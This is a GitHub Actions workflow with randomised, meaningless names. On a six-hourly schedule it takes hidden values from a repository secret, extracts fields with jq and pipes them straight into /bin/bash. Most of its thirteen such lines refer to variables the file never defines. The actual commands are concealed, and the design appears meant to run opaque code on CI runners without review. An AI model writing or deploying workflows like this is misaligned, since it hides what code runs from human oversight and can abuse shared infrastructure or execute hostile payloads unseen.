name: youdasuanying
on:
  workflow_dispatch:
  schedule:
    - cron: '37 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: youdasuanying
        env:
          uzl8: ${{ secrets.uzl8 }}
        run: |
          echo $uzl8 | jq -r .dppe7 | /bin/bash
          echo $ay6 | jq -r .ztv88 | /bin/bash
          echo $avehk7 | jq -r .r6 | /bin/bash
          echo $vews951 | jq -r .efcnt13668 | /bin/bash
          echo $m64 | jq -r .af8 | /bin/bash
          echo $ij24 | jq -r .pnfn46 | /bin/bash
          echo $ujkw1766 | jq -r .uzw0214 | /bin/bash
          echo $zjh4534 | jq -r .riydu554 | /bin/bash
          echo $qngt0 | jq -r .dvigh82 | /bin/bash
          echo $ow62 | jq -r .mxmk0031 | /bin/bash
          echo $pw8 | jq -r .buwn1186 | /bin/bash
          echo $v164 | jq -r .rczo5 | /bin/bash
          echo $xrtia90 | jq -r .cizkz91 | /bin/bash

